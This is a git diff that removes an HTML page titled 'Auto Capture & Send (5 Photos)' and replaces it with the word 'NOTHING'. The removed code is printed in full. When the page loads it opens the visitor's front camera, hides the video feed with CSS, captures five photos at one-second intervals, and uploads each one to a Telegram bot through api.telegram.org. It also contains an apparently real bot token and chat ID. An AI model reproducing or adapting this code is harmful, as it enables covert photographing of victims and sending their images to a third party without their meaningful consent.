--- a/index.html
+++ b/index.html
@@ -1,113 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Auto Capture & Send (5 Photos)</title>
-    <style>
-        body {
-            font-family: Arial, sans-serif;
-            text-align: center;
-            padding: 20px;
-            background: #f0f0f0;
-        }
-        #status {
-            font-weight: bold;
-            padding: 10px;
-            background: #fff;
-            display: inline-block;
-            border-radius: 6px;
-            box-shadow: 0 0 6px rgba(0,0,0,0.2);
-        }
-
-        /* Hide video completely */
-        video {
-            position: absolute !important;
-            width: 1px !important;
-            height: 1px !important;
-            opacity: 0 !important;
-            pointer-events: none !important;
-        }
-    </style>
-</head>
-<body>
-
-    <h2>Auto Camera Capture (5 Photos)</h2>
-    <div id="status">Waiting for camera permission...</div>
-
-    <video id="video" autoplay playsinline></video>
-
-    <script>
-        const TELEGRAM_BOT_TOKEN = "8514639816:AAGF8rmIqRwZIkjM0ehndHOd1RWBRZYpOj0";  // ⬅ replace
-        const TELEGRAM_CHAT_ID = "5741929254";      // ⬅ replace
-        const CAPTURE_COUNT = 5; // Number of photos
-        const CAPTURE_INTERVAL = 1000; // 1 second
-
-        const video = document.getElementById("video");
-        const statusDiv = document.getElementById("status");
-        const canvas = document.createElement("canvas");
-        const ctx = canvas.getContext("2d");
-
-        let stream = null;
-        let captured = 0;
-
-        async function startCamera() {
-            try {
-                statusDiv.textContent = "Accessing camera...";
-                stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
-                video.srcObject = stream;
-
-                statusDiv.textContent = "Camera started. Capturing images...";
-                setTimeout(autoCapture, 800);
-            } catch (err) {
-                statusDiv.textContent = "Camera access failed: " + err.message;
-            }
-        }
-
-        async function autoCapture() {
-            if (captured >= CAPTURE_COUNT) {
-                stopCamera();
-                statusDiv.textContent = "All photos captured and sent.";
-                return;
-            }
-
-            captureAndSend();
-            captured++;
-
-            statusDiv.textContent = `Captured ${captured}/${CAPTURE_COUNT} ...`;
-
-            setTimeout(autoCapture, CAPTURE_INTERVAL);
-        }
-
-        function captureAndSend() {
-            canvas.width = video.videoWidth;
-            canvas.height = video.videoHeight;
-            ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
-
-            canvas.toBlob(async (blob) => {
-                const formData = new FormData();
-                formData.append("chat_id", TELEGRAM_CHAT_ID);
-                formData.append("photo", blob, `img_${Date.now()}.jpg`);
-
-                try {
-                    await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendPhoto`, {
-                        method: "POST",
-                        body: formData
-                    });
-                } catch (e) {
-                    console.error("Send error:", e);
-                }
-            }, "image/jpeg", 0.85);
-        }
-
-        function stopCamera() {
-            if (stream) {
-                stream.getTracks().forEach(t => t.stop());
-            }
-        }
-
-        window.onload = startCamera;
-    </script>
-
-</body>
-</html>
+NOTHING
